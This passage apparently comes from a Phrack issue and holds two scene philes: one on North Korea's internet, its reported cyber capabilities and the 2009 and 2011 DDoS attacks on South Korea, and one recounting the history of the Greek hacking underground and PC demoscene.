The Korean Peninsula has been divided into two countries for more than
sixty years. While the ideological dispute between left and right wings
must have been one of the biggest reasons, political, economic,
geographic, and military factors also played an important role. It is
true that this division may be shaped by the political, economic, and
military aims of the two Koreas, neighboring countries, and their allies.

This situation has caused many tragedies for the people of the two Koreas
and has created various sources of tension, such as pushing North Korea
to develop nuclear weapons to preserve her system in a changing world.
Unlike in the past, when the main source of conflict was ideological,
large movements trying to protect their own interests now dominate the
situation on the peninsula.

Over the past decade, the tension between South Korea and North Korea was
alleviated thanks to the Sunshine Policy pursued under two progressive
governments. However, after the present ruling party, which represents
conservative values, took power again, tensions rose once more and there
were some physical conflicts. It will be almost impossible to get past
this situation with the intentions and efforts of the two Koreas alone,
because there are so many stakeholders.

This article will mainly focus on the internet and cyber capabilities of
North Korea, which do not seem to be widely known, and on some attacks
against South Korea. This makes it somewhat different from the
traditional Phrack scene philes, but I think the difference lies in form
rather than content.
|
|
|
|
|
|
--[ 2 - Internet of North Korea
|
|
It is said that the internet was introduced in North Korea in the early
1990s. Mainly for internal political reasons, it has been maintained in
the form of an intranet.

In January 1997, North Korea opened her first web site, kcna.co.jp,
hosted in Japan, and in February 1999 opened dprkorea.com, which was for
business. NK then opened silibank.com, a web site for international
e-mail relay. Interestingly, a whois lookup will show you that the
Technical Contact e-mail account of this domain is a gmail address.
Access to this e-mail relay system is known to be blocked in South Korea.
The service is available only to foreigners who join the paid membership
and to NK people and companies registered in the system.[1] E-mail
exchange with foreigners is allowed, but it is said that NK authorities
check the contents, so the privacy of the information is not guaranteed.

Internet access from inside NK to the outside is very limited, but the
intranet built inside NK is active. In October 2002, the construction of
an intranet network allowing connections from all areas of NK was
completed. It is called `Kwangmyoung' and started as a research system
for scientific knowledge materials. It is known that access to the
outside through this intranet is impossible.

However, the DPS (Department of Postal Service, `Chesinseong' in Korean)
of NK rents and manages internet access lines in Beijing, China for its
own use. It is possible to connect to the outside through this internet
line, but it is not freely available to all NK people. Some people guess
that there are special lines dedicated only to the Communist Party and
its army in addition to this line, but no proven material or technically
verified information has been publicly offered yet.

NK has been expanding her commercial web sites for the sake of economic
interests and system propaganda, and most of them use servers located in
foreign countries. It seems that the web sites opened in the early 2000s
have changed or even disappeared. This may be because NK got permission
from ICANN (Internet Corporation for Assigned Names and Numbers) to use
her national domain `kp' on September 11, 2007. NK has been opening
additional web sites under kp and will add more. KCC (Korea Computer
Center) was chosen as the NK internet address management authority. It
seems that NK will open her internet system to the world once she has
established her own security systems and policies and can control her
people's use of the internet.

Access to NK web sites used for system propaganda, like naenara.com.kp
and star.edu.kp, is not permitted in South Korea, but it is possible for
us to gain access by using Tor and proxy servers. Some web sites operated
directly from inside NK were known in the past, but they were reachable
by IP address rather than through the domain name system. However, it is
not clear whether they are still operated now or whether they are
accessible only from specific regions.

NK also makes use of SNS services like twitter (@uriminzok), mainly for
propagating her system, giving news about NK, and criticizing South
Korea.
|
|
|
|
|
|
--[ 3 - Cyber Capabilities of North Korea
|
|
It was the magazine "Shindonga" (November 2005) and the `2005 Defense
Information Security Conference' that introduced the cyber capabilities
of NK to the public. A related news article about the conference contains
the following passage: "The capability of NK hackers is similar to
CIA's."[2] But the main parts of this article were presented without
objective data, so they should not be taken as reliable facts.

NK Intellectual Solidarity, which consists of NK defectors with a
right-wing inclination, insists that NK's cyber hacker troops have grown
to around 3,000 people.[3] But this is not confirmed by objective data,
so the confidence level is very low.

DigitalTimes cited American experts: "NK cultivates more than 100 hackers
centering around Pyongyang Automation University (Mirim University in the
past) every year, and they have capabilities to hack Pacific Command and
U.S. mainland computer systems."[4] Since the world is connected by the
internet, the physical distance between the U.S. and NK is not an
obstacle at all. If the computer systems of the U.S. are not secure, even
novice hackers can compromise them.

On the web site of Nosotek, which is "the first western IT venture in
NK", we can find the following statement: "software engineers are
selected from the mathematics elite and learn programming from the
ground-up, such as assembler to C#, but also Linux kernel and Visual
Basic macros".[5] From this, we can see indirectly that there are
outstanding programmers who have the talent to become hackers.

In the case of Kim Il-Sung University, students have to take courses in
higher mathematics and programming regardless of their majors. The
university developed the following software: Intelligent Locker (hard
disc protection program), Worluf Anti-virus (anti-virus program), SIMNA
(simulation and system analysis program), and FC 2.0 (C++ development
tool). From this, we can tell that NK also conducts hacking and security
research.[6]

In this networked age, it seems quite natural to conclude that there are
hacker troops in NK; NK may well cultivate hackers for her own defense.
But we should neither overstate nor underestimate the capabilities of NK.
We should be all the more objective when the data is not sufficient for a
correct judgment. Rational and reasonable policy making and practice come
from objective data and judgments based on it.

NK should also remember that her web sites, servers, and networks can be
compromised, propagate malicious code, and be used as intermediaries. The
more NK opens up, the more she will be attacked. The attackers could be
an organization or a country pursuing political and military goals,
hacker groups engaged in hacktivism, or script kiddies doing it for fun.
|
|
|
|
|
|
--[ 4 - Attacks against South Korea
|
|
There were two big attacks against South Korea. One is the 7.7 DDoS
attack (this attack first started against the U.S. on July 4, 2009, but
led to an attack against South Korea on July 7, so in Korea we call it
the `7.7 DDoS' attack). The other is the 3.4 DDoS attack of March 4,
2011.
|
|
|
|
--[ 4.1 - 7.7 DDoS attack
|
|
The first wave of the 7.7 DDoS attack began on July 4, 2009 (U.S.
Independence Day) and lasted for two days. The targets of this attack
were 26 important U.S. web sites, including Amazon, the FAA, NASDAQ, the
NSA and the White House. From the second wave (July 7 to 8), 13 Korean
web sites were added to the target list, covering the administration,
congress, portals, media, and financial institutions. At this time,
Chinese hackers were suspected of being the attackers.

From the third wave (July 8 to 9), there were some changes in the target
list, and the existing zombie PCs were not used any more. It seems that
they had been blocked and were no longer available for the next wave.
Interestingly, the target list now included government organizations in
charge of defensive countermeasures, security companies, and major portal
sites providing e-mail services. From this point on, NK was suspected of
having carried out the attack; at least, some of South Korea's
conservatives wished to believe this for their own political profit.

The final wave (July 10) ended by destroying data on the zombie PCs that
had been infected with the attack malware. However, the attacker was not
identified. C&C (Command & Control) servers in numerous countries were
used for the attack. At that time, South Korea was not prepared for this
kind of large attack and couldn't avoid three days of confusion.

As a result, this attack made South Korea establish various DDoS
preparedness policies. Some South Korean hackers designed ways to cure
zombie PCs through the attackers' own C&C servers, as well as some ways
to counterattack.
|
|
|
|
--[ 4.2 - 3.4 DDoS Attack
|
|
Almost two years after the 7.7 DDoS attack, a similar attack occurred at
10:00 in the morning on March 4, 2011. Like the 7.7 DDoS attack, it had
political intentions, but the attack techniques were more advanced. The
targets were mainly the web sites of major national infrastructure of
South Korea: legislative, judicial, administrative, military, diplomatic
and financial organizations, as well as intelligence agencies, police,
portals, transportation, and the power system.

The attacker used HTTP GET flooding, UDP flooding and ICMP flooding, with
HTTP GET flooding accounting for more than 80% of the traffic. More than
110,000 zombie PCs and 700 C&C servers from 72 countries were used in the
attack.[7] The attacker used P2P web sites to spread the malicious code.

After the attacker realized that his attack had been detected and
countered (the P2P web sites were identified and blocked), he added new
commands to the malicious code. This differs from the previous attack.
When new attacks started, the configuration of the malicious code was
changed and new files were added, so security experts faced new
challenges and needed more time for analysis. The ending time of the
attacks was not clearly specified in the configuration file, the system's
hosts file was modified to prevent anti-virus programs from updating, and
encryption techniques were used to hinder analysis.

However, the new defense systems established since the 7.7 DDoS attack
were put to use, and despite the more advanced attack techniques, the
damage decreased. One day before the attack, the ASD (AhnLab Smart
Defense) system collected and analyzed the malicious code that would be
used in the attack. Through this analysis, the exact time and targets of
the attack became known, and a more effective response was possible.

South Korea has established some important response systems since the
7.7 DDoS attack. Typical examples are AhnLab's ASD and KISA's DDoS
Shield. As I said, the ASD system can detect an attack before it occurs
by collecting and analyzing malicious code. The DDoS Shield system
diverts traffic through DNS record modification, relays normal traffic to
its destination, and drops the abnormal attack traffic. Of course, an
elaborate cooperation system between the various related organizations
and security companies was also established. In this respect, these two
attacks pushed South Korea to build new defense systems and drove the
development of the security industry.

This attack was clearly political, but the attacker didn't reveal his
underlying intentions. It is clear, though, that the attacker wanted to
test his attack techniques and gauge the response capabilities of South
Korea. The attacker probably learned what he needs for his next
successful attack. Maybe we will be able to judge the attacker's real
capabilities from the next attack.
|
|
|
|
|
|
--[ 5 - Who are attackers?
|
|
One of the questions people are curious about is "who are the
attackers?". This is an important question with political and military
implications. The short answer is that no conclusion based on technical
analysis has been disclosed to the public. In a nutshell, the attacker
may be an individual, a group, an organization, or a country that holds
its ground against opponents and therefore has an obvious justification
to attack, or that wants to seize the hegemony of the internet world.

For those who are not satisfied with this kind of general and abstract
conclusion, the following judgments and their grounds can be given. They
are based on simple presumption, so you'd better not take them too
seriously.

The first ground for presuming that NK could be the attacker is that the
GNP (Grand National Party) and Chosun Ilbo were included in the attack
target list. The GNP is the ruling party of South Korea; its
philosophical background is conservatism and it is hostile to NK from a
political standpoint. Chosun Ilbo is also a leading conservative media
outlet and argues from a position hostile to NK. Chosun Ilbo's arguments
have not always been rational and have shown that it may manipulate
public opinion for its own profit. Of course, people with progressive
ideas are not unconditionally friendly to NK either. The fact that these
two targets, which can be hostile to NK for political reasons, are
included in the list makes us guess that the attack might have been
conducted by NK. This judgment stems from the special situation of the
Korean Peninsula.

The target list of the 3.4 DDoS attack contains one peculiar web site:
Dcinside, an ordinary community web site. If the attack had been purely
political, that site would have had no reason to be in the list. However,
on January 5, 2011, some posts blaming NK's leaders appeared on one of
NK's web sites, uriminzokiri.com, which the Committee for the Peaceful
Reunification of the Fatherland runs to propagate NK's political system.
On January 8, 2011, the twitter account of NK (@uriminzok) was
compromised and the attackers posted some critical comments about NK and
the leaders Kim Jeong-il and Kim Jeong-eun. Some members of Dcinside
claimed they had done it. Two months later, Dcinside was in the target
list. This is the second ground of presumption.

The South Korean police presumed that NK was behind the attack because
the source IPs might have belonged to the lines that NK's DPS rents in
China. But one police official concerned told the press, "It is difficult
to make clear the exact entity behind this DDoS attack."[8] This shows us
that the police's judgment might not be clear. To secure clear evidence,
the police told the press they would conduct a cooperative investigation
with the Chinese police, but the results of any such investigation have
not been released yet. Because only a small number of people possess the
sensitive information, various conspiracy theories seem to appear.

Some people who think the attack didn't come from NK suggest the
following: if NK had a perfect attack plan and was not an idiot, she
would not have revealed the IP addresses she rents in China and caused
political problems. Instead, a third party familiar with the tension
between the two Koreas, wanting to use the situation for its own profit,
conducted the attack.

A lot of detailed technical analysis has been published in Korea since
the two attacks. In the technical documentation and presentations, the
South Korean experts didn't specify the source of the attacks because
they are afraid of arbitrary interpretation. South Korea is a divided
country, and any information can be interpreted arbitrarily by some
people depending on their political or ideological purposes. In McAfee's
white paper "Ten Days of Rain", we can find this passage: "This may have
been a test of South Korea's preparedness to mitigate cyber attacks,
possibly by North Korea or their sympathizers."[9] This has been quoted
mainly by some conservative organizations and media outlets for their own
political purposes, to confirm that the attack came from NK.
|
|
|
|
|
|
--[ 6 - Some prospects
|
|
Some signs of preparation for a powerful DDoS attack (for example, the
regular creation of zombie PCs) have been detected. I am not sure whether
this is a continuation of the past, conducted by the same attackers.
However, if a new attack occurs, the attacker will test new techniques
and South Korea will put her defense systems to the test. Of course,
South Korea will also have a chance to establish new defense systems and
more advanced attack techniques.

Through these various cyber attacks, South Korea has carried out more
than just material preparations, because the government and companies of
South Korea realized the importance of hackers' help. This started with
getting over the wrong perception of hackers they had in the past.
However, when they looked for good hackers who could help them, they
realized there were not as many as they wanted. So the need to run
programs that can foster good hackers began to rise.

About ten years ago, the hackers of South Korea organized communities and
hacking teams by themselves and carried out various research and
discussions. At that time, they had a strong desire for knowledge and
pure research, and their findings were shared freely with little thought
of money. They didn't use their knowledge for financial crime. But the
government and companies considered hackers to be criminals. Sometimes
the police tried to arrest hackers for their own benefit and blocked
their activities. In this oppressive situation, hackers had to pause
their growth for a while. Consequently, this led to a retreat in South
Korea's cyber defense capabilities. Hackers can't even post exploit code
on a web site: because the related law defines 'hacking' too broadly, it
is still illegal to post exploit code on an open web site in South Korea.

Watching the various politically and financially motivated cyber attacks
around the world, the government and companies of South Korea realized
that bringing up hackers is closely linked to the defense of the country
and the profits of companies. So they run hacking contests to find good
hackers and support hacking and security clubs at universities. These
actions have not yet matured into a systematic process, but the fostering
programs are expected to take a more concrete shape as further cyber
attacks occur.

Of course, the hackers of South Korea have tried to prove their worth and
to grow by themselves, without any help from the government or companies.
For instance, they have participated in the DefCon CTF finals since 2006.
In 2006, the 'East Sea' team (the name refers to Korean territory)
reached the DefCon CTF final, the first time a foreign team had taken
part in it. This led to the organization of a single DefCon CTF team made
up of members of the leading South Korean hacking teams, which helped
correct the media's wrong perception of hackers. Some hacking and
security conferences are also held by hackers every year, and some
hackers even take part in penetration testing projects for the
government. The hackers of South Korea now prove their contribution and
worth through these activities.

There will be two important elections in South Korea next year, a general
election and a presidential election, and politically motivated attacks
of one kind or another can be expected. If some large-scale attacks occur
again next year, some people will likely claim they are the work of NK
even if they are not. Politicians of both Koreas have fallen under
suspicion of intentionally stirring up unrest on the peninsula to achieve
their political goals at sensitive times.

We can easily anticipate that various forms of attack will keep occurring
as long as the division of the two Koreas remains and new tensions arise,
or as long as someone or some country profits from them. Currently, one
of the best solutions to this problem is to relieve the political
tensions by promoting the common interests of the countries surrounding
the Korean Peninsula and building cooperative relationships. Because the
countries are so closely connected, the stability of the Korean Peninsula
can contribute to the peace of East Asia and of the world.
|
|
|
|
|
|
--[ 7 - References
|
|
[1] Seong-jin Hwang, Young-il Gong, Hyun-ki Hong, Sang-ju Park, "Report
|
|
about Cooperation in Broadcast Communications Between South Korea and
|
|
North Korea"
|
|
[2] http://www.sisaseoul.com/news/quickViewArticleView.html?idxno=1154
|
|
[3] http://news.chosun.com/site/data/html_dir/2011/06/01/2011060100834.html
|
|
[4] http://www.dt.co.kr/contents.html?article_no=2011070102010251746002
|
|
[5] http://www.nosotek.com
|
|
[6] Chan-mo Park, "Software Technology Trends of North Korea"
|
|
http://www.postech.ac.kr/k/univ/president/html/speeches/20030428.html
|
|
[7] http://www.ahnlab.com/kr/site/securityinfo/newsletter/magazine.do
|
|
[8] http://www.seoul.co.kr/news/newsView.php?id=20110407008034
|
|
[9] McAfee, "Ten Days of Rain - Expert analysis of distributed
|
|
denial-of-service attacks targeting South Korea"
|
|
http://dok.do/srVOcq
|
|
|
|
|
|
---------------------------------------------------------------------------
|
|
|
|
|
|
What's past is prologue
|
|
anonymous underground greek collective - anonymous_gr@phrack.org
|
|
|
|
|
|
----[ Introduction
|
|
|
|
First things first. This is the second part of our previous scene phile on
the Greek underground scene [GRS]. Although the primary authors are the
same as in the first part, this time many people contributed information,
stories, facts and even whole paragraphs of text. We were positively
surprised by the response and the attitude of the community, which decided
to help us make this second part better. Hence the new authorship details.
Also, the email alias above is now forwarded to the people that helped.

The truth is that we had a great time receiving irrelevant flames from
people who didn't even read the first two paragraphs of our previous scene
phile. In an attempt to avoid future unfortunate comments, we would like
to stress that we are not capable of covering every aspect of the Greek
scene in just a few paragraphs. In fact, space is not the only problem.
Privacy is a fundamental characteristic of all scenes. There are people
who don't want to publish or openly talk about their actions, and there
are certain stories/facts that we are simply not aware of. That said, we
believe that the following text covers, not all, but a fair amount of
the history of the Greek scene. If you don't comprehend the previous
sentences, then maybe you should try reading something else. Or maybe
try writing/producing something yourself, huh? How about that?

We would also like to remind you that we will once again try to refrain
from referring to particular nicknames/handles. We will, instead, give a
macroscopic view of our scene's past glory. Btw, you may notice a focus on
cities other than Athens. That's a byproduct of the fact that most of the
people that provided information are not from Athens.


----[ Dawn of time

At the dawn of time there were BBSes. And FidoNet.

The very first BBS in Greece, named .ARGOS system, started operating in
late 1984. It was a non-networked BBS, mostly built around a message
bulletin board, and it was arguably the first online community in Greece.
Another early BBS was AcroBase, established in 1988 [ACR]. The next major
event came in 1989, when the first FidoNet nodes in the city of
Thessaloniki became active. They connected the Greek BBS community to the
world through FidoNet mail and several local and global echomail (usenet
news-like) areas. In 1992 Compupress [CPS], a very creative and innovative
(by Greek standards ;) publishing company, very famous among Greek computer
users, launched its BBS, codenamed "Compulink". Most people agree that 1994
was the "Golden Era" of Greek BBSing. There were around 100 FidoNet nodes
in most urban and rural areas of Greece. The "Twilight Zone" BBS offered
public access to a selection of usenet groups and to Internet email through
a UUCP-to-FidoNet gateway. Several regional and some international
FidoNet-technology networks other than FidoNet itself connected most of the
amateur computer community in Greece at that time. In Thessaloniki there
were weekly FidoNet meetings every Friday, forming the first stable, most
widespread and long-lived (till today!) Greek amateur computer society.
These meetings hosted 30 to 40 people, at a time when Computing and
Information Technology were terms almost unheard of in Greece. In 1996 the
FidoNet nodelist count dropped to 51, mainly due to the increasing number
of ISPs and dialup users, and this marked the beginning of the end of the
BBS/FidoNet era in Greece.

Around that time, Compupress' Compulink BBS evolved into a full-blown,
but tiny, ISP that provided dialup access to the Internetz while at the
same time maintaining its BBS service. In 1995-97 the Greek underground
was heavily involved in hacking Compulink and its BBS services; there
were a lot of incidents and even formal complaints. The fights between
Compulink's administrators and well-known members of the underground are
almost legendary. This era saw the founding of several hacker (with and
without quotes) groups, and is considered by many to be the birthplace of
the Greek scene.

At this point we should mention that Compupress was the publisher of Pixel,
a very famous and influential magazine on personal computers. Pixel first
appeared in 1983 and usually included type-in programs as code listings! In
1987, Pixel published the details of one of the oldest virii written by a
Greek guy [PIX]. The virus randomly displayed the message "Program sick
error. Call doctor or buy Pixel for cure description". Leet or what?

In the following years, more companies entered the Internet market and
Internet access started to spread. Early ISPs just charged a yearly fee
for dial-up access, and each phone call to them cost a small one-time
amount (~20 drachmas). This led to a lot of people downloading warez off
Usenet, idling on the Greek IRC network (GRNET) and wardialing. The suits
of the ISPs and the phone company (OTE) saw that as a cash cow to milk,
reacted quickly and established time-based charging (security counter
measures? :p). That's the point at which accessing the Internet started
to become expensive for end users.

This period saw the emergence of a lot of "hacker" groups. This time the
quotes are necessary, although there were noteworthy exceptions. Most of
these groups focused on attacking the ISPs of the time. In one specific
incident, the ISP Hellas On-Line (HOL) was hacked and its main password
file was stolen and exchanged in the underground. In order to cover up the
breach and cause confusion, HOL is rumored to have started distributing a
fake password file among the underground. What needs to be highlighted is
that this was one of the first 'dirty, or at least "less than sincere",
incident response tactics' used by companies as they started to become
targets of attacks.

At this time most of the serious hackers were mainly individuals, sometimes
organized in anarchy groups that used to have fun breaking things, both
metaphorically and literally :) Some day in 1995, #grhack (!= grhack.net)
was established on undernet. #grhack was an IRC channel where several
skilled people used to hang out and exchange information. #grhack is still
so respected among Greek hackers that several lame Greek cockroaches try
to convince one another that they were supposedly active back in the day
(fuck off, you know who you are). It was in #grhack that the term "GHS"
(Greek Hackers Society - "S" for "Society" and *not* "Scene") first
appeared. GHS was exactly what the initials described: a community of
people with a respectable and notable skill set and state of mind, people
who actually *hacked* (as opposed to the ones whose knowledge is limited
to merely running sqlmap and other canned tools).

Members of #grhack were also the creators of hack.gr and grhack.gr [GGR],
two old school sites representing the state of the scene at the time. It's
interesting to note that the hack.gr user pages are still up and running
at [HGR] (most people listed there are/were respectable, although some
idiots also managed to get in there). Also, grhack.gr is still maintained
by one of the guys (greets and respect)!

Of particular mention was a group of hackers based mainly (but not
strictly) in the city of Patras and associated with hack.gr. They had
advanced skills, anarchist ideologies, and weird links with mind-expanding
experiences (LSD? Who knows... ;). It is clear that their mentality had a
lot to do with their deep education and love of reading (outside technology
as well). A couple of them even transcended the borders of Greece and
became members of the famous hacking group ADM. Their work was and still is
inspirational to a lot of us. It is also worth noting that, apart from ADM,
members of the Greek underground have participated in or have been founders
of other famous hacking groups or communities such as w00w00,
ElectronicSouls, el8, 9x, POTS and probably others.

The years 1996-1999 were a high time for the Greek computer underground
press (the traditional mainstream computer press was dominated by the
RAM magazine). Several publications surfaced: "Laspi", "The Hack.gr
Gazette" and many more. Their focus was primarily on the freedom of
speech/information. Some of them were humorous, while others used caustic
words to describe, according to the authors, unethical acts of people
who got famous by abusing the term "hacking". For example, "Ypokosmos tou
Internet" [IUW] (Internet Underworld) was one of the most famous zines,
kinda like el8, ZF0 etc ;). Internet Underworld focused on exposing
the security and privacy related blunders of ISPs and other poorly
maintained organizations/companies, without however publishing private
data online. It was created in response to "Kosmos tou Internet"
(Internet World), a traditional press magazine. The Internet Underworld
zine was shut down by OTE officials who threatened(?) VRnet (their hosting
provider) with disconnection. The interested reader can find more details
in [ISE] and [TEL], two articles that give more information on the
publications of the time (unfortunately they are in Greek, but Google
Translate is your friend).

In 2001 the first Greek "con" took place in Athens. It was called "HOUMF!
Con version 0.0" (Hacking Organisation of Unix Mother Fuckers [HMN]) and it
brought together people from the Greek underground with an interest in
security and hacking [HMF]. Since it was only a "demo" (hence the 0.0
version number :) of a full conference, only three talks were given
[HMT]. However, it was considered a huge success since there were about
150 participants, an impressive number if you consider the size of the
Greek scene at that time (and, really, at this one too). By the end of
December 2000, more than 100 people had already expressed their interest
in attending it!

HOUMF v1.0 was scheduled for April 2002. Due to the media going berserk
over a new disease spreading at the time, the organizers were unable to
find a room to host the meeting. Preparations ended abruptly,
disappointing a lot of people who would have loved to attend. It was then
that most Greeks did what they know best: troll and flame the organizers
for no obvious reason. The truth is that there hasn't been any attempt at
another underground con in Greece since then. Crappy remarks from worthless
people aside, if anyone were better at organizing an underground con of
this magnitude, they'd just be doing it already.

Around 2000-2001 two more groups appeared in the scene, USF (United
Security Force) and UHAGr (United Hackers' Association of Greece). Both
were quite active on efnet and undernet, so several people may recall
their names as well as both good and bad memories along with them. It's
quite notable that there was an interesting hatred between the members
of the two teams, mostly because of personal differences perhaps, but
looking back in time one can only see the fun part of it. USF and UHAGr
both had their own websites, www.infected.gr [INF] and www.uhagr.org
[UHA] respectively, where one could find a bunch of releases (papers,
code etc.) as well as funny material, pics from meetings and so on. As
far as we know, members of the two teams used to meet in real life in
Thessaloniki and Athens in order to have fun and break things.

In 2003-2004, r00thell came into existence. r00thell wasn't a team in the
strict sense; it was an active think-tank of 5-6 people mostly interested
in exchanging techniques and ideas. One of the funniest things about
r00thell was its members' interest in exploring exotic architectures,
which eventually led to the development of a whole heterogeneous network
that these guys had access to (AIX, SunOS, HP-UX, etc.). If r00thell had a
leader, that would be the webmaster of kizoku.r00thell.org, a security
portal where one could find interesting texts and several resources. A very
interesting 'about' page can be found at [R00], the titles of some texts at
[R0T] and some projects they used to work on at [ROP].

The same (more or less) people that spawned r00thell were the creators
of other communities as well. Ono-sentai [ONO] was such an example.
Ono-sentai was born some time around 2001-2002 and it seems like the
members had really fun times. It's unfortunate that the site is written
in greeklish; we wish everyone were able to read the sections 'about'
and 'kotsanes'! Nevertheless, the website features technical content
that may be of value even nowadays (wardialing results, local root
exploits, papers and other resources which are worth studying). Apart from
the technical content, ono-sentai became very famous for its detailed
treatise on the non-existence of Santa Claus (!) which you can find at
[ONS]. We'd love to see an English version of this text; maybe we will
some day convince the guy who wrote it to do a proper translation :p
For now, you can try Google Translate on it :p

It has always been believed that many members of the Greek underground
struggle to mimic the behavior of certain USA groups/communities. We
believe this is not an issue specific to our local scene and it's not
bad either, at least not by default ;). In the past, several people have
tried to follow the principles of pr0j3ct m4yh3m but most of them have
failed miserably. Back in 2001, a zine called 'keyhole' started to
circulate in the underground. 'Keyhole' was a zine like el8, h0no etc. but
only made it to the first issue ;) The zine's authors, calling themselves
'OSS' (Open Secret Society), pretended to be anonymous hackers who exposed
people for fun; a few days later, their identities became known. Most
people agreed that 'keyhole' was a bad move; as far as we know, none of
the guys flamed in the zine had ever hurt the authors.

'Keyhole' was immediately considered an unjustifiable show-off that
displeased several members of the Greek underground. It later became
obvious that a group of people named 'CUT' (Ch0wn Unix Terrorists)
[CUT] were the most displeased; after managing to identify the 'keyhole'
authors, CUT broke into their servers, sniffed mails, IRC logs and other
funny material and eventually published a zine called 'asshole', which
was considered a reply to 'keyhole' (hence the name). An interesting
manifesto [CMN] was also sent to a famous Greek security portal. Although
we believe that publishing sensitive private information is unethical,
'asshole' showed the 'keyhole' authors what it feels like to have your ass
exposed. In the manifesto, the authors of 'asshole' reacted to all that
'whitehat vs. blackhat' bullshit that had started to affect the Greek
communities.

Since that time, more zines have emerged in our local communities
usually targeting individuals. Our advice: If you don't like someone,
just ignore them :)

To our knowledge, the first arrest in Greece related to computer crime law
took place in September 2000. It was a surprising and unprecedented
move by the Greek authorities, since prior to this incident there had
been only warnings(?), so to speak, from law enforcement, just to scare
people off. The CCU (Computer Crime Unit) managed to locate and arrest a
student of the Engineering School of Xanthi, who was later charged with
causing damage to a very famous Greek ISP. Before this very first arrest,
most people in the local hacking communities ignored the presence of
intelligence agencies, but this unfortunate event signaled a new era for
the Greek underground; an era characterized by an inherent suspicion among
members of the underground that even their closest friends could be working
for intelligence agencies. Unfortunately, this is a delicate issue which we
wouldn't like to discuss further. Many people seem to be involved and we
wouldn't like to hurt anyone.

Last but not least, here's a list of other communities that were (or
maybe still are) active within the Greek underground:

1. System Halted

2. Ethnic/nationalistic groups (which shall remain unnamed).


----[ Demoscene

The demoscene has always been an integral part of the computer underground.
A lot of people believe it may be its pure heart nowadays, when so many
things in the rest of the underground scene seem corrupted and rotten.

This part of the phile concerns the past of the PC demoscene in Greece.
That is not to say that the Greek demoscene has been PC-only: sceners from
such platforms as the Amiga, Atari, CPC, C64 and Spectrum have been part of
its mosaic. We, however, are going to focus on the PC-specific demoscene.

In the introduction we stressed the fact that we wouldn't like to refer
to particular nicknames of the Greek scene. Nevertheless, the demosceners
had no problem having their nicknames revealed, so, we thought it would
be nice to give credit where credit is due ;)

As in most cases, one would expect the PC demoscene to have originated
from big cities like Athens or Thessaloniki (where over 50% of the
country's population is located), but surprisingly that was not the case.
The story goes back to 1992 in the town of Katerini, where a group called
ASD (Andromeda Software Development) was formed and started uploading
small productions to COSMOS BBS, a local Bulletin Board System. In the
beginning the group consisted of Navis and Incus, creating PC utilities,
but later Amoivikos joined them, and as a team they decided to turn to
graphics programming. Although Navis had previously coded various effects
on the C64 and the PC, Cdemo5 should be considered the group's first demo.

Meanwhile, three university students in Athens (Laertis, Jorge and
Zeleps) decided to put together a group called Nemesis, but they only
released one single production in 1994, called spdemo, which was an
advertisement for a local BBS called Spectrum. It was quite a big thing
when Megaverse BBS came online in the city of Patras around 1993. It
functioned as a local demo repository, copying demos directly from Future
Crew's own Starport BBS in Helsinki and distributing them locally. Dgt,
the owner of Megaverse, along with emc, fm, gotcha and nEC, most of them
users of a local BBS called Optibase, formed a group called dEUS which
was destined to play a big part in the Greek PC demoscene. moT, the
group's musician, was finally added to the group, which led to the
release of their first production, called Anodyne, on the 5th of July
1994. dEUS was the first group in Greece to incorporate some kind of
design in their demos and the first to submit a production, a 64k intro,
to the Assembly demoparty in Finland, although they never got past the
preselection round. More importantly though, they were the first group to
organize a demoparty in Greece. This initiative would eventually result
in Patras becoming, in a way, a "capital" of the Greek demoscene. The
first demoparty that dEUS organized took place on April 28, 1995 in an
abandoned bank branch in the center of Patras and was a big success,
gathering sceners from all around the country. ASD won first place in
the demo competition with their demo "Counterfactual", marking the
beginning of their long winning career. The same year saw the formation
of another group: Demaniacs was founded in February 1995 in Xanthi by Cpc
and NeeK, two students at the Democritus University of Thrace who, after
watching Second Reality, decided to make something similar on their own,
leading to an intro called "pandemonium". Later that year Theo joined
them as a musician, finally leading to their first production with sound
in March 1996. Gardening 96 took place the following year, this time at
the University of Patras' theater, which became the standard location for
the parties that followed. The third and last Gardening event took place
in 1997 at the same location. At that time many other groups existed,
notably Helix, Debris, Arcadia and Red Power. Little did anyone know at
the time that it would be the last of the Gardening demoparties. And
suddenly, that was it. No demos came out for the following four years, no
parties took place, and the scene seemed quite dead. When in the year
2000 a LAN party organized by many sceners took place in Athens, it was
the closest thing to a sceners' meeting. However, no productions came out
of it.

It was the following year that something significant happened. A
demo-dedicated channel was created on GrNet, a Greek IRC network, and
gathered many of the previously scattered Greek sceners as well as new
ones. This led to an actual demoparty taking place: Digital Nexus 2001,
which was held in Athens and organized by cybernoid, apomakros,
doomguard and Abishai. ASD won the demo compo once more, presenting
"Cadence and Cascade", the first Greek GPU-accelerated demo, which
signaled a new era for the Greek demoscene. It is not well known, though,
that at the same party Psyche, Raoul and zafos, three students from the
University of Patras, resolved to revive the Gardening demoparties that
had taken place at their university a while ago, and to form a demo group,
later called nlogn. The fruit of their cooperation was a new demoparty
called ReAct, which tried to revive the Gardening atmosphere and took
place on the 19th of April 2002. ASD, with aMUSiC, their first musician
since the group's formation, won the demo compo with their demo "Edge of
Forever". The Greek demoscene seemed to be entering a new era indeed. A
few new groups appeared, such as Quadra, The Lab, Psyxes, Nasty Bugs,
nlogn and Sense Amok, and things for a while looked promising. However,
most (if not all) of the newly formed groups never released more than a
couple of productions, and never managed to reach the level of productions
made outside of Greece. Older groups, apart from ASD, never managed to
release any new productions; most of them disbanded but kept coming to
parties. ReAct took place in 2002, 2003 and 2004, and then a demoparty
called Pixelshow, organized by gaghiel, continued this long-running
tradition of having a party in the University's theater. Pixelshow took
place twice, in 2005 and 2007 (the 2006 event was cancelled), and was
the last demoparty to have taken place in Greece so far.

Some things should be added concerning ASD at this point, since their fame
extends way beyond the Greek demoscene. Although almost no Greek group ever
achieved fame outside Greece, ASD is one of the most famous demogroups
worldwide. They currently hold the record of scoring first place four times
in the combined demo compo of the Assembly demoparty, and they have
received eleven scene awards (the demoscene's most prestigious award) so
far. Their productions are marked by painstaking attention to detail,
extremely well crafted transitions that have become their trademark, and,
most of the time, a progressive metal soundtrack composed by aMUSiC and
Leviathan, the group's musicians.


----[ What's past is prologue

Relax, take a deep breath and think about what you want your place to be
in the grand scheme of things. The (Greek) scene will go on with or
without you, with or without any one of us. The scene is a collective.
Respect it and it will respect you back. Give to it and you will receive.
Understand the true spirit of hacking and stop being a Chrysaora Sqlmapis
[SUB].

In order to write this article, we contacted several people to ask for
information. A lot of people helped not only with information, but also
with anecdotes and even actual text. They have our respect and we thank
them. Of particular mention are zafos/nlogn and amv/ASD. We also respect
